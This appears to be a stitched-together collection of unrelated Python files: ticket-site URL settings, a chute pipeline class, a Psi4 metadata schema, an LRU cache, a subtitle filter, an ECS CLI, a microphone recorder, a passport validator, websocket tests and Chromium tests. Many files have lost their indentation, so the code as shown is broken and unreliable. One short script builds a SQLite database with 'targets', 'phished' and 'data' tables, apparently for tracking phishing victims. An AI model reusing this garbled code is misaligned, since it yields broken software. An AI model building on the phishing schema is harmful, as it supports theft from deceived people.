'check_login': URL_BASE + 'otn/login/checkUser',
'passengers': URL_BASE + 'otn/confirmPassenger/getPassengerDTOs',
'order_init_submit': URL_BASE + 'otn/leftTicket/submitOrderRequest',
'order_confirm': URL_BASE + 'otn/confirmPassenger/initDc',
'order_check': URL_BASE + 'otn/confirmPassenger/checkOrderInfo',
}
# 3rd party tools settings
# Setup for settings
import socket
if socket.gethostname() in ['duankq-ThinkPad-X201', ]:
DEBUG = True
else:
DEBUG = False
import os
for loc in LOCATIONS.values():
if not os.path.isdir(loc):
os.mkdir(loc)
for (k, v) in SEAT_CODES.iteritems():
SEAT_ID[k] = SEAT_ID[v.upper()]
SEAT_ID[v] = SEAT_ID[v.upper()]
|
from hellbox.chutes.chute import Chute
class CompositeChute(Chute):
    """Wraps a linear sequence of chutes so it can be used as a single chute."""
    def __init__(self, *chutes):
        # Clone each chute so wiring them together here does not mutate the originals.
        chutes = [self.__clone(c) for c in chutes]
        self.head = self.tail = chutes[0]
        for chute in chutes[1:]:
            # Chain with >>; the result of each chaining becomes the new tail.
            self.tail = self.tail >> chute
    def __call__(self, *args):
        # Feed input into the first chute in the chain.
        self.head(*args)
    def to(self, *args):
        # Attach downstream consumers to the last chute in the chain.
        self.tail.to(*args)
    def __rrshift__(self, other):
        # Support `other >> composite` by wiring `other` into the head.
        other.to(self.head)
        return self.tail
    def __clone(self, chute):
        # Shallow copy: a new instance sharing a copy of the original's attribute dict.
        c = object.__new__(chute.__class__)
        c.__dict__ = chute.__dict__.copy()
        return c
|
import sqlite3
from os import system
a= system("rm dbz")
conn = sqlite3.connect('dbz')
conn.execute("""
CREATE TABLE targets (hash TEXT NOT NULL PRIMARY KEY, name TEXT)
""")
conn.execute("""
CREATE TABLE phished (hash TEXT, timings DATETIME)
""")
conn.execute("""
CREATE TABLE data (hash TEXT NOT NULL PRIMARY KEY, details TEXT)
""")
conn.commit()
conn.close()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*
# Copyright: [CUP] - See LICENSE for details.
# Authors: Guannan Ma (@mythmgn),
"""
:description:
    **Async Module is a TCP framework for asynchronous network msg transferring**
"""
# TODO:
# 1. If the socket has been in a state in which it does not send or
#    recv any msg for more than 30 mins, shut down the context.
# 2. Msg management
# Enhancement list:
# 1. If the socket has too many msgs pending there and they cannot be
#    sent out, consider this net link dead, then shut it down and close it.
# 2. Multiple threads sending things.
# BUGS:
# FIXED:
# 1. Send socket does not register in epoll
# 2. Peer2Context has resource competition
# 3. connection has starvation bug
# Silly mistakes that I made:
# 1. TCP context creation and deletion does not have a lock. (Mainly on creation)
# 2. Net MSG queue will become very large if the network read/write speed does
# not match.
# 3.
# vi:set tw=0 ts=4 sw=4 nowrap fdm=indent
|
# tools for dealing with files, mostly images
"""
Copyright 2016 Fabric S.P.A, Emmanuel Benazera, Alexandre Girard
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
from os import listdir
from os.path import isfile, join
from os import walk
import os
import time
import glob
import sys
def list_files(repository,ext='.jpg',nfiles=-1,pattern='*',last_hour=-1):
onlyfiles = []
fpattern = repository + '/' + pattern + ext
filenames = glob.glob(fpattern)
if last_hour >= 1:
nfilenames = []
past = time.time() - last_hour*60*60
for f in filenames:
if os.path.getmtime(f) >= past:
nfilenames.append(f)
return nfilenames
if nfiles > 0:
return filenames[:nfiles]
else:
return filenames
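# Usage sketch (hypothetical directory): list the .jpg files modified within the
# last two hours; note that last_hour takes precedence over nfiles here.
#   recent = list_files('/data/images', ext='.jpg', last_hour=2)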
|
#
# Copyright The NOMAD Authors.
#
# This file is part of NOMAD.
# See https://nomad-lab.eu for further info.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np # pylint: disable=unused-import
import typing # pylint: disable=unused-import
from nomad.metainfo import ( # pylint: disable=unused-import
MSection, MCategory, Category, Package, Quantity, Section, SubSection, Reference
)
from nomad.datamodel.metainfo import simulation
from nomad.metainfo.metainfo import JSON
m_package = Package()
class Run(simulation.run.Run):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_git_rev = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_process_id = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_psidatadir = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_memory = Quantity(
type=np.dtype(np.float64),
shape=[],
# unit='MiB',
description='''
''')
x_psi4_threads = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_input_file = Quantity(
type=str,
shape=[],
description='''
''')
class System(simulation.system.System):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_molecular_point_group = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_full_point_group = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_molecular_symmetry = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_rotational_constants = Quantity(
type=np.dtype(np.float64),
shape=[3],
# unit='1/cm',
description='''
''')
x_psi4_nuclear_repulsion = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_charge = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_multiplicity = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_electrons = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_nalpha = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_nbeta = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class Scf(simulation.method.Scf):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_diis = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_mom = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_fractional_occupation = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_guess_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_integral_threshold = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class BasisSetAtomCentered(simulation.method.BasisSetAtomCentered):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_blend = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_n_shells = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
Gives the number of shell types used.
''')
x_psi4_max_angular_momentum = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
Maximum angular momentum quantum number corresponding to the shells used.
''')
x_psi4_n_cartesian_functions = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_spherical_harmonics = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_n_ecp_primitives = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
x_psi4_n_ecp_core_electrons = Quantity(
type=np.dtype(np.int32),
shape=[],
description='''
''')
class Method(simulation.method.Method):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_scf_algorithm_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_diis = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_mom = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_fractional_occupation = Quantity(
type=bool,
shape=[],
description='''
''')
x_psi4_guess_type = Quantity(
type=str,
shape=[],
description='''
''')
x_psi4_options = Quantity(
type=JSON,
shape=[],
description='''
''')
x_psi4_jk_matrices_parameters = Quantity(
type=JSON,
shape=[],
description='''
''')
x_psi4_parameters = Quantity(
type=JSON,
shape=[],
description='''
''')
class DFT(simulation.method.DFT):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_molecular_quadrature = Quantity(
type=typing.Any,
shape=[],
description='''
''')
class x_psi4_root_information(MSection):
m_def = Section(validate=False)
x_psi4_root_energy = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
class Calculation(simulation.calculation.Calculation):
m_def = Section(validate=False, extends_base_section=True)
x_psi4_s2_expected = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s2_observed = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s_expected = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_s_observed = Quantity(
type=np.dtype(np.float64),
shape=[],
description='''
''')
x_psi4_root_information = SubSection(sub_section=x_psi4_root_information.m_def, repeats=True)
|
class DoubleLinkedListNode(object):
def __init__(self, value):
self.value = value
self.next = None
self.previous = None
def __repr__(self):
return str(self.value)
class LRU_Cache(object):
def __init__(self, capacity: int):
self._cache = dict()
self.capacity = capacity
self.head = DoubleLinkedListNode(0)
self.tail = DoubleLinkedListNode(0)
self.head.next = self.tail
self.tail.previous = self.head
def get(self, key):
if key in self._cache:
node = self._cache.get(key)
self._remove(node)
self._add(node)
return node
return -1
def set(self, key, value):
if key in self._cache:
            self._remove(self._cache.get(key))
node = DoubleLinkedListNode(value)
self._add(node)
self._cache[key] = node
if len(self._cache) > self.capacity:
node = self.head.next
self._remove(node)
node_key = list(self._cache.keys())[list(self._cache.values()).index(node)]
del self._cache[node_key]
def _add(self, node):
last_node = self.tail.previous
last_node.next = node
self.tail.previous = node
node.previous = last_node
node.next = self.tail
def _remove(self, node):
previous_node = node.previous
next_node = node.next
previous_node.next = next_node
next_node.previous = previous_node
def __iter__(self):
node = self.head
while node:
yield node
node = node.next
def __len__(self):
return len(self._cache)
our_cache = LRU_Cache(3)
our_cache.set(1, 1)
our_cache.set(2, 2)
our_cache.set(3, 3)
our_cache.set(4, 4)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
print ("Pass" if (2 == our_cache.get(2).value) else "Fail")
print ("Pass" if (3 == our_cache.get(3).value) else "Fail")
print ("Pass" if (-1 == our_cache.get(9)) else "Fail")
our_cache = LRU_Cache(0)
our_cache.set(1, 1)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
our_cache = LRU_Cache(1)
our_cache.set(1, 0)
our_cache.set(2, 0)
print ("Pass" if (-1 == our_cache.get(1)) else "Fail")
|
#!/usr/bin/python3
"""Filter and/or process subtitles' content that match a particular pattern."""
import importlib
import logging
from . import _cli
log = logging.getLogger(__name__)
def _true(param):
"""Always returns true for matching functionality."""
return True
def _pass(param):
"""Always returns the given parameter for process functionality."""
return param
def match(subtitles, imports, func_match, func_process, lines):
"""
Passes each matching subtitle-content to a function.
:param subtitles: :py:class:`Subtitle` objects
:param imports: Modules to import in the context of the function.
:param str func_match: The function used to match lines.
:param str func_process: The function used to process subtitle content.
    :param bool lines: Whether to apply the functions to each line of content
        (as opposed to the whole content string).
:rtype: :term:`generator` of :py:class:`Subtitle` objects
"""
for import_name in imports:
real_import = importlib.import_module(import_name)
globals()[import_name] = real_import
# fmt: off
    # Evaluate each function
match_func = eval(func_match) if func_match else _true # nosec pylint: disable-msg=eval-used
process_func = eval(func_process) if func_process else _pass # nosec pylint: disable-msg=eval-used
# fmt: on
# Match and process each subtitle (or subtitle-line).
for subtitle in subtitles:
if lines:
matched_lines = [
line for line in subtitle.content.splitlines() if match_func(line)
]
processed_lines = [process_func(line) for line in matched_lines]
subtitle.content = "\n".join(processed_lines)
else:
if match_func(subtitle.content):
subtitle.content = process_func(subtitle.content)
else:
subtitle.content = ""
yield subtitle
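# Usage sketch (assuming an iterable of srt Subtitle objects): keep only lines
# containing a digit and strip surrounding whitespace from them. Both functions
# are passed as strings and evaluated, mirroring the CLI flags defined below.
#   cleaned = match(
#       subtitles,
#       imports=[],
#       func_match='lambda line: any(c.isdigit() for c in line)',
#       func_process='lambda line: line.strip()',
#       lines=True,
#   )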
def set_args():
examples = {
"Only include Chinese lines": "srt match -m hanzidentifier -fm hanzidentifier.has_chinese",
"Exclude all lines which only contain numbers": "srt match -fm 'lambda x: not x.isdigit()'",
"Strip HTML-like symbols from a subtitle": """srt match -m re -fp 'lambda sub: re.sub("<[^<]+?>", "", sub)'""",
}
parser = _cli.basic_parser(description=__doc__, examples=examples)
parser.add_argument("--match", "--fm", help="The function used to match lines.")
parser.add_argument("--process", "--fp", help="The function used to process lines.")
parser.add_argument(
"--module",
"-m",
help="modules to import in the function context",
action="append",
default=[],
)
parser.add_argument(
"--lines",
"-l",
help="Match the content of each subtitle-line, not each subtitle-content.",
action="store_true",
)
return parser.parse_args()
def main():
args = set_args()
logging.basicConfig(level=args.log_level)
_cli.set_basic_args(args)
matched_subs = match(args.input, args.module, args.match, args.process, args.lines)
output = _cli.compose_suggest_on_fail(matched_subs, strict=args.strict)
args.output.write(output)
if __name__ == "__main__": # pragma: no cover
main()
|
import sys
import click
from ..alias import AliasedGroup
from .. import core, display, exceptions
@click.group(cls=AliasedGroup, short_help='Create or update resources.', invoke_without_command=True)
@click.option('-f', '--file', 'file_path', type=click.Path(exists=True),
help="Select file or folder that contains the configuration to apply.")
@click.option('-t', '--template', 'template_path', type=click.Path(exists=True),
help="Select file or folder that contains the template configuration to apply.")
@click.option('-e', '--env', 'envs', multiple=True,
              help="Set a template variable as key=value (can be used multiple times).")
@click.option('--env-file', 'env_file', multiple=True,
              help="File with template variables, one key=value per line (can be used multiple times).")
@click.option('--dry-run', is_flag=True, default=False,
help="If true, only print the object that would be sent, without sending it")
@click.option('--deploy', is_flag=True, default=False,
help="During update task-definition also update service.")
@click.option('-c', '--cluster',
help="Specify cluster to execute command. Default usage cluster from context.")
@click.pass_context
def apply(ctx, file_path, template_path, dry_run, deploy, envs, env_file, cluster, **kwargs):
"""
\b
# Apply yaml file with service definition
cmd::ecsctl apply -f my-app/service.yaml
\b
# Apply yaml file with task definition
cmd::ecsctl apply -f my-app/task-definition.yaml
\b
# Apply yaml template with task definition and set variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env image=my-image -e tag=1.0.0
\b
# Apply yaml template with task definition and file with variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file dev.env
\b
# Apply yaml template with task definition and file with variables
cmd::ecsctl apply -t my-app/task-definition.yaml.tpl --env-file common.env --env-file dev.env
\b
# Apply folder with configuration files
cmd::ecsctl apply -f my-app/
\b
# Apply yaml file with task definition and update service
cmd::ecsctl apply -f my-app/task-definition.yaml --deploy
\b
# Check yaml file with task definition
cmd::ecsctl apply -f my-app/task-definition.yaml --dry-run
"""
bw = ctx.obj['bw']
if not cluster:
cluster = ctx.obj['cluster']
if file_path and not template_path:
_type, f = 'file', core.FileLoader(file_path)
elif template_path and not file_path:
_type, f = 'template', core.FileLoaderTemplate(template_path, envs, env_file)
else:
click.echo(click.style(str('Usage only template or file to apply.'), fg='red'))
return
for doc in f.load():
object_type = core.ObjectType(cluster=cluster, item=doc)
tmpl = object_type.get_template()
click.echo(click.style(object_type.ID, fg='yellow'))
if dry_run:
tmpl.run_before(boto_wrapper=bw)
param = display.de_unicode(tmpl.to_request())
tmpl.run_after(param, boto_wrapper=bw)
click.echo(click.style(param, fg='blue'))
click.echo('\n')
else:
try:
resp = bw.apply_object(tmpl=tmpl, deploy=deploy)
except Exception as err:
click.echo(click.style(str(err), fg='red'))
sys.exit(1)
else:
click.echo(click.style(object_type.show_response(resp), fg="green"))
if resp.get('deploy'):
ID = 'Service: {}'.format(resp['deploy']['service']['serviceName'])
show_response = resp['deploy']['service']['serviceArn']
task_definition = resp['deploy']['service']['taskDefinition']
click.echo(click.style(ID, fg='yellow'))
click.echo(click.style('{} -> {}'.format(show_response, task_definition), fg="green"))
|
import pyaudio
import wave
import audioop
from collections import deque
import os
import urllib
import time
import math
import subprocess as sub
FLAC_CONV = 'flac -f' # We need a WAV to FLAC converter. flac is available
# on Linux
# Microphone stream config.
CHUNK = 1024 # CHUNKS of bytes to read each time from mic
FORMAT = pyaudio.paInt16
CHANNELS = 1
RATE = 16000
THRESHOLD = 1000 # The threshold intensity that defines silence
# and noise signal (an int. lower than THRESHOLD is silence).
SILENCE_LIMIT = 3 # Silence limit in seconds. The max amount of seconds where
# only silence is recorded. When this time passes the
# recording finishes and the file is delivered.
PREV_AUDIO = 0.5 # Previous audio (in seconds) to prepend. When noise
# is detected, how much of previously recorded audio is
                 # prepended. This helps to prevent chopping the beginning
# of the phrase.
DURATION = 40 # Maximum chunk duration
rel = RATE/CHUNK
def audio_int(num_samples=50):
""" Gets average audio intensity of your mic sound. You can use it to get
average intensities while you're talking and/or silent. The average
is the avg of the 20% largest intensities recorded.
"""
print ("Getting intensity values from mic.")
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
values = [math.sqrt(abs(audioop.avg(stream.read(CHUNK), 4)))
for x in range(num_samples)]
values = sorted(values, reverse=True)
r = sum(values[:int(num_samples * 0.2)]) / int(num_samples * 0.2)
print (" Finished ")
print (" Average audio intensity is ", r)
stream.close()
p.terminate()
return r
def listen_for_speech(threshold=THRESHOLD, num_phrases=-1):
"""
Listens to Microphone, extracts phrases from it and sends it to
Google's TTS service and returns response. a "phrase" is sound
surrounded by silence (according to threshold). num_phrases controls
how many phrases to process before finishing the listening process
(-1 for infinite).
"""
# Open stream
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,
channels=CHANNELS,
rate=RATE,
input=True,
frames_per_buffer=CHUNK)
print ("* Listening to microphone... ")
audio2send = []
cur_data = '' # current chunk of audio data
slid_win = deque(maxlen = int(SILENCE_LIMIT * rel))
# Prepend audio from 0.5 seconds before noise was detected
prev_audio = deque(maxlen = int(PREV_AUDIO * rel))
started = False
n = num_phrases
response = []
while (num_phrases == -1 or n > 0):
cur_data = stream.read(CHUNK)
slid_win.append(math.sqrt(abs(audioop.avg(cur_data, 4))))
#print slid_win[-1]
        if(sum([x > threshold for x in slid_win]) > 0):
if(not started):
print (" Starting phrase recording")
started = True
audio2send.append(cur_data)
elif (started is True):
print (" Finished")
# The limit was reached, finish capture and deliver.
filename = save_speech(list(prev_audio) + audio2send, p)
# Send file to Google and get response
# r = stt_google_wav(filename)
# if num_phrases == -1:
# print ("Response", r)
# else:
# response.append(r)
# Remove temp file. Comment line to review.
# os.remove(filename)
# Reset all
started = False
slid_win = deque(maxlen = int(SILENCE_LIMIT * rel))
prev_audio = deque(maxlen = int(PREV_AUDIO * rel))
audio2send = []
n -= 1
print ("Listening ...")
else:
prev_audio.append(cur_data)
print ("* Done recording")
stream.close()
p.terminate()
return response
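# Usage sketch: calibrate the silence threshold from ambient noise first, then
# listen with a slightly higher cutoff (the 1.5 margin is an arbitrary choice).
#   ambient = audio_int(num_samples=50)
#   listen_for_speech(threshold=ambient * 1.5)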
def chunks(l, n):
"""Yield successive n-sized chunks from l."""
for i in range(0, len(l), n):
yield l[i:i + n]
def save_speech(data, p):
""" Saves mic data to temporary WAV file. Returns filename of saved
file """
data = b''.join(data)
output_folder = str(time.strftime('%d%m%Y'))
if os.path.exists(output_folder) == False:
os.mkdir(output_folder)
if os.path.exists(output_folder + "/" + "noise") == False:
os.mkdir(output_folder + "/" + "noise")
if len(data) > (rel * DURATION):
dur = int(32768 * DURATION)
print (len(data), dur)
dataset = chunks(data, dur)
# dataset = [data[i:i + dur] for i in range(0, len(data), dur)]
filenames = []
current_time = str(time.strftime('%H%M%S'))
for index, item in enumerate(dataset):
filename = current_time + '_' + str(index)
wf = wave.open(output_folder + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(item)
filenames.append(filename)
wf.close()
return filenames
else:
if len(data) < (rel * SILENCE_LIMIT + PREV_AUDIO * 1.5):
print("Audio too short, likely to be noise.")
filename = str(time.strftime('%H%M%S'))
wf = wave.open(output_folder + "/" + "noise" + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
else:
filename = str(time.strftime('%H%M%S'))
wf = wave.open(output_folder + "/" + filename + '.wav', 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(pyaudio.paInt16))
wf.setframerate(RATE)
wf.writeframes(data)
wf.close()
return filename
if(__name__ == '__main__'):
audio_int() # To measure your mic levels
listen_for_speech() # listen to mic.
#print stt_google_wav('hello.flac') # translate audio file
|
import math
def tokenizePassports(inputList):
tempPassport = {}
passports = []
for row in inputList:
if len(row) > 0:
items = row.split(" ")
for item in items:
item = item.split(":")
tempPassport[item[0]] = item[1]
else:
passports.append(tempPassport)
tempPassport = {}
if len(tempPassport) > 0:
passports.append(tempPassport)
return passports
def validateByr(value):
try:
value = int(value)
except ValueError:
return False
if not (1920 <= value <= 2002):
return False
return True
def validateIyr(value):
try:
value = int(value)
except ValueError:
return False
if not (2010 <= value <= 2020):
return False
return True
def validateEyr(value):
try:
value = int(value)
except ValueError:
return False
if not (2020 <= value <= 2030):
return False
return True
def validateHgt(value):
height = value[:-2]
unit = value[-2:]
if unit not in ["in", "cm"]:
return False
try:
height = int(height)
except ValueError:
return False
if unit == "cm":
if not (150 <= height <= 193):
return False
else:
if not (59 <= height <= 76):
return False
return True
def validateHcl(value):
if value[0] != "#":
return False
if len(value) != 7:
return False
try:
int(value[1:], 16)
except ValueError:
return False
return True
def validateEcl(value):
if value not in ["amb","blu","brn","gry","grn","hzl","oth"]:
return False
return True
def validatePid(value):
if len(value) != 9:
return False
return True
def validateField(key, value):
switch = {
"byr": validateByr,
"iyr": validateIyr,
"eyr": validateEyr,
"hgt": validateHgt,
"hcl": validateHcl,
"ecl": validateEcl,
"pid": validatePid,
"cid": lambda value: True
}
return switch[key](value)
def validatePassport(passport):
for key in passport.keys():
if validateField(key, passport[key]):
continue
else:
print("[X] passport has wrong field {}: {}".format(key, passport[key]))
return False
return True
inputList = []
with open("./4/input.txt") as inputFile:
for line in inputFile:
line = line.replace("\n","")
inputList.append(line)
passports = tokenizePassports(inputList)
validPassports = 0
necessaryKeys = {"byr","iyr","eyr","hgt","hcl","ecl","pid"}
for passport in passports:
passportKeys = set(passport.keys())
if necessaryKeys.issubset(passportKeys):
if validatePassport(passport):
print("[O] passport with {} is valid".format(passportKeys))
validPassports += 1
continue
else:
print("[X] passport missing {}, {}".format(necessaryKeys.difference(passportKeys), passport))
print("the number of valid passports is {}".format(validPassports))
|
import asyncio
import logging
import os
import websockets
from fenix_pipeline import ConnectionClosed
from fenix_pipeline import RawDataSocket
from fenix_pipeline import SubscriptionTypes
from fenix_pipeline import Trade
log = logging.getLogger(__name__)
LOCAL_ONLY = os.environ.get('LOCAL_ONLY', 'true').lower() in ('t', 'true', '1')
API_KEY = os.environ.get('FENIX_API_KEY')
LOG_LEVEL = os.environ.get('LOG_LEVEL', 'debug')
RUN_DURATION = int(os.environ.get('DURATION', 3))
SUBSCRIPTIONS = os.environ.get('SUBSCRIPTIONS', 'trades_by_market:btc-usdt')
async def test_socket_lifecycle(event_loop):
subscriptions = [_get_subscription_parts(s) for s in SUBSCRIPTIONS.split('/')]
socket = RawDataSocket(API_KEY, event_loop=event_loop)
if LOCAL_ONLY:
socket.uri = 'ws://localhost:8765'
message_emitter = None
try:
log.info('starting receiver')
async with await socket.connect(print_messages) as subscriber:
log.info('subscribing')
for subscription in subscriptions:
await subscriber.subscribe(*subscription)
await subscriber.monitor(RUN_DURATION)
log.info('unsubscribing')
for subscription in subscriptions:
await subscriber.unsubscribe(*subscription)
except ConnectionClosed:
log.info('socket closed, exiting lifecycle loop')
finally:
if message_emitter and not message_emitter.done():
log.info('awaiting message emit task')
await asyncio.gather(message_emitter)
def _get_subscription_parts(subscription):
values = subscription.split(':')
return SubscriptionTypes[values[0].upper()], values[1] if values[1] else None
async def simple_sample(event_loop):
# read the API key from a local environment variable called `FENIX_API_KEY`
socket = RawDataSocket(os.environ.get('FENIX_API_KEY'))
# using a context manager
async with await socket.connect(message_handler=print_messages) as subscriber:
# subscribe to the `btc-usdt` stream
await subscriber.subscribe(
SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
# just receive messages for the next 10 seconds
await subscriber.monitor(10)
# unsubscribe from the `btc-usdt` stream
await subscriber.unsubscribe(
SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
# done
async def test_channel_to_all_state_transitions(event_loop):
socket = RawDataSocket(API_KEY, event_loop=event_loop)
if LOCAL_ONLY:
socket.uri = 'ws://localhost:8765'
async with await socket.connect(message_handler=print_messages) as subscriber:
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdu')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdv')
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.ALL_TRADES, None)
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
await subscriber.unsubscribe(SubscriptionTypes.ALL_TRADES, None)
await asyncio.sleep(1)
await subscriber.subscribe(SubscriptionTypes.TRADES_BY_MARKET, 'btc-usdt')
await asyncio.sleep(1)
async def print_messages(item):
if isinstance(item, Trade):
log.info('received: %r', item)
else:
log.info('other message: %s', item)
if __name__ == '__main__':
logging.getLogger().addHandler(logging.StreamHandler())
log_level = getattr(logging, LOG_LEVEL.upper())
logging.getLogger('fenix').setLevel(log_level)
log.setLevel(log_level)
event_loop = asyncio.get_event_loop()
event_loop.run_until_complete(test_socket_lifecycle(event_loop))
|
# Generated by Django 3.0.7 on 2020-06-18 05:56
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('problem', '0008_auto_20200618_1347'),
]
operations = [
migrations.AlterModelOptions(
name='problem',
options={'permissions': (('edit', 'Can edit problem'), ('remove', 'Can delete problem'),
('view_hidden', 'Can view hidden problem'))},
),
]
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from datetime import datetime
import json
import mock
from google.appengine.ext import ndb
import webapp2
from gae_libs.testcase import TestCase
from handlers import collect_tree_closures
from model.tree_closure import TreeClosure
from model.tree_closure import TreeStatus
class CollectTreeClosuresTest(TestCase):
app_module = webapp2.WSGIApplication(
[
('/collect-tree-closures', collect_tree_closures.CollectTreeClosures),
],
debug=True)
def testGetCurrentCheckingPointForTreeWithoutExistingData(self):
self.MockUTCNow(datetime(2017, 04, 13, 10, 10, 10))
expected_checking_point = datetime(2017, 01, 13, 10, 10, 10)
checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c')
self.assertEqual(expected_checking_point, checking_point)
def testGetCurrentCheckingPointForTreeWithExistingData(self):
TreeClosure(tree_name='c', closed_time=datetime(2017, 04, 10, 10, 10)).put()
TreeClosure(
tree_name='c',
closed_time=datetime(2017, 04, 11, 05, 05),
opened_time=datetime(2017, 04, 11, 05, 15)).put()
expected_checking_point = datetime(2017, 04, 11, 05, 15)
checking_point = collect_tree_closures._GetCurrentCheckingPointForTree('c')
self.assertEqual(expected_checking_point, checking_point)
@mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get')
def testRetrieveTreeStatusSuccess(self, mocked_Get):
mocked_Get.side_effect = [(200,
json.dumps([{
'date': '2017-04-01 12:12:12',
'message': 'm1',
'general_state': 'open',
'username': 'test@chromium.org',
}, {
'date': '2017-04-01 12:12:12',
'message': 'm1',
'general_state': 'open',
'username': 'test@chromium.org',
}]), {})]
statuses = collect_tree_closures._RetrieveTreeStatus(
'chromium', datetime(2017, 03, 31))
self.assertEqual(1, len(statuses))
self.assertEqual(statuses[0].time, datetime(2017, 04, 01, 12, 12, 12))
self.assertEqual(statuses[0].message, 'm1')
self.assertEqual(statuses[0].state, 'open')
self.assertEqual(statuses[0].username, 'test@chromium.org')
mocked_Get.assert_called_once_with(
'https://chromium-status.appspot.com/allstatus',
params={
'limit': 1000,
'format': 'json',
'endTime': 1490918400,
})
@mock.patch.object(collect_tree_closures.FinditHttpClient, 'Get')
def testRetrieveTreeStatusFailure(self, mocked_Get):
mocked_Get.side_effect = [(400, 'error', {})]
statuses = collect_tree_closures._RetrieveTreeStatus(
'chromium', datetime(2017, 03, 31), end_time=datetime(2017, 04, 01))
self.assertEqual(0, len(statuses))
mocked_Get.assert_called_once_with(
'https://chromium-status.appspot.com/allstatus',
params={
'limit': 1000,
'format': 'json',
'endTime': 1490918400,
'startTime': 1491004800,
})
def testExtractFailureInfoWithFullBuildLink(self):
message = ('Tree is closed (Automatic: "compile" on '
'http://build.chromium.org/p/m/builders/b/builds/1 "b" from ...')
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual(('m', 'b', '1', 'compile'), info)
def testExtractFailureInfoWithPartialBuildLink(self):
message = ('Tree is closed (Automatic: "compile" on '
'/builders/b/builds/1 "b" from ...')
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual((None, 'b', '1', 'compile'), info)
def testExtractFailureInfoWithUnknownMessageFormat(self):
message = 'Tree is closed for blink rename'
info = collect_tree_closures._ExtractFailureInfo(message)
self.assertEqual((None, None, None, None), info)
